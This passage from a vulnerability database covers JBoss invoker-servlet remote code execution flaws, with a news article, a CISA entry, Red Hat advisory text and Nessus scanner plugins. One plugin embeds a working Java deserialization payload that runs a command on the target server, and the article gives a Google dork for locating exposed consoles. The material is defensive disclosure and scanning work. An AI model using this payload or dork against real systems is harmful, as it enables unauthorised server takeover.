attackers.\n\nThe number of infections has surged since exploit code called **_pwn.jsp_** was publicly disclosed on October 4th. The **pwn.jsp** shell isn't the only exploit available; Imperva\u2019s Barry Shteiman confirmed the availability of another, more sophisticated shell available to attackers. 
\n\n> \u201c_In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities_,\u201d\n\nA number of government and education-related websites have been hacked through the JBoss Application Server vulnerability, which lets an attacker obtain remote shell access on the target system to inject code into a website hosted on the server or steal files stored on the machine.\n\n> \"_The vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server. Once the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that Application Server._\"\n\nImperva researchers demonstrated that JBoss AS is vulnerable to _[remote command execution](<http://thehackernews.com/search/label/remote%20code%20execution>)_ via the \u2018_HTTP Invoker_\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB).\n\nThe Invoker improperly exposes the management interface: \"_JBoss Application Server is vulnerable to remote command execution via the \u2018HTTP Invoker\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB)_\".\n\nOn Sept. 
16th, the National Vulnerability Database issued an advisory warning of a critical remote code execution bug affecting HP ProCurve Manager, it's assigned to the flaw the Common Vulnerability Enumeration code **_[CVE-2013-4810](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>)_** and on October 4th 2013, a security researcher has disclosed the code of an exploit for the JBoss Application Server vulnerability.\n\n \n\n\nAs consequence the security community had witnessed a surge in Jboss AS hacking, the malicious traffic originated from the compromised servers was detected by Imperva\u2019s honey pots.\n\n \n\n\nIn a few weeks an exploit was added to _[exploit-db](<http://www.exploit-db.com/exploits/28713/>)_ that successfully gained shell against a product running **JBoss 4.0.5**.\n\n \n\n\nImperva confirmed that the number of web servers running Jboss Application Server exposing management interfaces has tripled since the initial vulnerability research was public disclosed passing from 7,000 to 23,000.\n\n \n\n\nI have just run the following Google Dork retrieving more than 17000 results:\n\n> _intitle:\u201dJBoss Management Console \u2013 Server Information\u201d \u201capplication server\u201d inurl:\u201dweb-console\u201d OR inurl:\u201djmx-console\u201d_\n\n[](<http://3.bp.blogspot.com/-73eMvUVgFOQ/Uo4gzZ5AMKI/AAAAAAAAY5M/tubiO2mjQ1U/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\nIt is possible to note that Google reconnaissance enables the attacker to identify also governmental and educational websites, some of them also result infected. \n\n> \"_Many of the deployed web shells utilize the original pwn.jsp shell code that was presented with the original exploit, as can be seen in a [blog entry](<http://nickhumphreyit.blogspot.co.il/2013/10/jboss-42-hacked-by-pwnjsp.html>) posted by one of the attack\u2019s victims. In other cases a more powerful web shell was deployed. 
In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities._\"\n\nThe concerning aspect of the story is that, once again, a two-year-old vulnerability could be easily exploited to compromise a huge quantity of information; the situation is analogous to the [Silverlight](<http://securityaffairs.co/wordpress/19843/hacking/microsoft-silverlight-5-flaw.html>) flaw that menaces users of Netflix, the provider of on-demand Internet streaming media.\n", "cvss3": {}, "published": "2013-11-21T04:13:00", "type": "thn", "title": "Two-year-old vulnerability in JBoss Application Servers enables Remote Shell for Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:16:59", "id": "THN:8573602ED2B18F90AC04D8BA8D25E682", "href": "http://thehackernews.com/2013/11/Vulnerability-JBoss-Application-Servers-exploit-code.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "HP ProCurve Manager (PCM), PCM+, Identity Driven Manager (IDM), and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "HP Multiple Products Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2013-4810", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-09-19T15:43:46", "description": "The remote JBoss server is affected by multiple remote code execution vulnerabilities :\n\n - A flaw exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. A remote attacker can exploit this issue to bypass authentication and invoke MBean methods, allowing arbitrary code to be executed in the context of the user running the server.\n (CVE-2012-0874)\n\n - The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host.\n (CVE-2015-7501)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-10T00:00:00", "type": "nessus", "title": "JBoss Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0874", "CVE-2015-7501"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:redhat:jboss_a-mq", "cpe:/a:redhat:jboss_bpm_suite", "cpe:/a:redhat:jboss_data_virtualization", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_portal_platform", "cpe:/a:redhat:jboss_enterprise_soa_platform", "cpe:/a:redhat:jboss_enterprise_web_server", "cpe:/a:redhat:jboss_fuse", "cpe:/a:redhat:jboss_fuse_service_works", "cpe:/a:redhat:jboss_operations_network", "x-cpe:/a:redhat:jboss_data_grid"], "id": "JBOSS_JAVA_SERIALIZE.NASL", "href": 
"https://www.tenable.com/plugins/nessus/87312", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87312);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2012-0874\", \"CVE-2015-7501\");\n script_bugtraq_id(57552, 78215);\n script_xref(name:\"CERT\", value:\"576313\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n\n script_name(english:\"JBoss Java Object Deserialization RCE\");\n script_summary(english:\"Attempts to execute a command on the remote host via a crafted RMI request.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote JBoss server is affected by multiple remote code execution\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote JBoss server is affected by multiple remote code execution\nvulnerabilities :\n\n - A flaw exists due to the JMXInvokerHAServlet and\n EJBInvokerHAServlet invoker servlets not properly\n restricting access to profiles. A remote attacker can\n exploit this issue to bypass authentication and invoke\n MBean methods, allowing arbitrary code to be executed\n in the context of the user running the server.\n (CVE-2012-0874)\n\n - The remote host is affected by a remote code execution\n vulnerability due to unsafe deserialize calls of\n unauthenticated Java objects to the Apache Commons\n Collections (ACC) library. 
An unauthenticated, remote\n attacker can exploit this, by sending a crafted RMI\n request, to execute arbitrary code on the target host.\n (CVE-2015-7501)\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/solutions/2045023\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate interim fix according to the vendor advisory.\nAlternatively, ensure that all exposed ports used by the JBoss server\nare firewalled from any public networks.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_a-mq\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_bpm_suite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_data_virtualization\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_portal_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_soa_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_fuse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_fuse_service_works\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_operations_network\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:redhat:jboss_data_grid\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"string.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\n# Check http banner for JBoss\nbanner = get_http_banner(port: port);\nif (\"JBoss\" >!< banner && \"Apache-Coyote\" >!< banner) audit(AUDIT_NOT_LISTEN,\"JBoss\",port);\n\n# Open connection to JBoss.\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL,\"JBoss\",port);\n\n#\n# setup unique id for pingback\n#\nid_tag = hexstr(rand_str(length:10));\n\n#\n# build request\n#\nrn = raw_string(0x0d, 0x0a);\nraddress = get_host_ip();\nladdress = compat::this_host();\n\ncmd = \"ping -c 10 -p \" + string(id_tag) + \" \" + laddress;\ncmdlen = strlen(cmd);\n\nserObj = hex2raw(s:\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E7
3666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\");\nserObj += raw_string(cmdlen) + cmd;\nserObj += hex2raw(s:\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\");\n\ncontentLen = strlen(serObj);\n\npostdata = \"POST /invoker/JMXInvokerServlet HTTP/1.1\" + rn +\n\"Host: \"+ raddress +\":\"+ string(port) + rn +\n\"Content-Type: application/x-java-serialized-object; 
class=org.jboss.invocation.MarshalledValue\" + rn +\n\"Content-Length: \" + string(contentLen) + rn + rn +\nserObj;\n\n# See if we get a response from RMI payload\nfilter = \"icmp and icmp[0] = 8 and src host \" + raddress;\ns = send_capture(socket:soc, data:postdata, pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || id_tag >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"JBoss\",port);\n\nreport = NULL;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus was able to exploit a Java deserialization vulnerability using' +\n '\\n' + 'a crafted RMI request.' +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:11:17", "description": "According to its self-reported version number, the version of Cisco Prime Data Center Network Manager (DCNM) installed on the remote host is affected by a remote code execution vulnerability. Unauthorized users have access to the JBoss Application Server Remote Method Invocation services. A remote, unauthenticated attacker could exploit this to execute arbitrary code as SYSTEM (on Windows) or root (on Linux).\n\nThis plugin determines if DCNM is vulnerable by checking the version number displayed in the web interface. 
The web interface is not available in older versions of DCNM.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-11T00:00:00", "type": "nessus", "title": "Cisco Prime Data Center Network Manager RMI Remote Code Execution (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036", "CVE-2012-5417"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_6_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/67247", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67247);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-5417\");\n script_bugtraq_id(56348);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCtz44924\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCua31204\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20121031-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager RMI Remote Code Execution (uncredentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. 
A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\n\nThis plugin determines if DCNM is vulnerable by checking the version\nnumber displayed in the web interface. The web interface is not\navailable in older versions of DCNM.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ef95f6c\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 6.1(2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-667\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_prime_dcnm_web_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_dcnm_web\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\napp_id = \"cisco_dcnm_web\";\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:app_id, port:port, exit_if_unknown_ver:TRUE);\n\nurl = build_url(qs:install['path'], port:port);\nver = install['version'];\n\nmatch = eregmatch(string:ver, pattern:\"^([0-9.]+)\\(([^)]+)\\)\");\nif (isnull(match)) exit(1, \"Failed to parse the version (\"+ver+\").\");\n\nmajor = match[1];\nbuild = match[2];\n\nif (\n ver_compare(ver:major, fix:'6.1', strict:FALSE) > 0 || # < 6.1.x\n (major == '6.1' && build !~ '^1([^0-9]|$)') # 6.1.x < 6.1(2)\n) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 6.1(2)\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:12:00", "description": "According to its self-reported version number, the version of Cisco Prime Data Center Network Manager (DCNM) installed on the remote host is affected by a remote code execution vulnerability. Unauthorized users have access to the JBoss Application Server Remote Method Invocation services. 
A remote, unauthenticated attacker could exploit this to execute arbitrary code as SYSTEM (on Windows) or root (on Linux).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-11T00:00:00", "type": "nessus", "title": "Cisco Prime Data Center Network Manager RMI Remote Code Execution (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036", "CVE-2012-5417"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_6_1_2_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/67248", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67248);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-5417\");\n script_bugtraq_id(56348);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCtz44924\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCua31204\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20121031-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager RMI Remote Code Execution (credentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. 
A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ef95f6c\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 6.1(2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-667\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/20\"); \n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", 
\"cisco_prime_dcnm_installed_linux.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\ndisplay_ver = install['display_version'];\n\nfix = '6.1.2.0';\ndisplay_fix = '6.1(2)';\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, appname, display_ver);\n\n# Could be Windows or *nix\nport = get_kb_item('SMB/transport');\nif (!port) port = 0;\n\nif (report_verbosity > 0)\n{\n if (isnull(display_ver))\n display_ver = ver;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:06", "description": "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. 
The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730)\n\nApache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379)\n\nWhen an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL.\n(CVE-2012-3546)\n\nThe JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908)\n\nAn XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. 
(CVE-2011-4575)\n\nSecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370)\n\nConfiguring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478)\n\ntwiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066)\n\nNonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034)\n\nThe JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server.\n(CVE-2012-0874)\n\nThe JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377)\n\nCallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. 
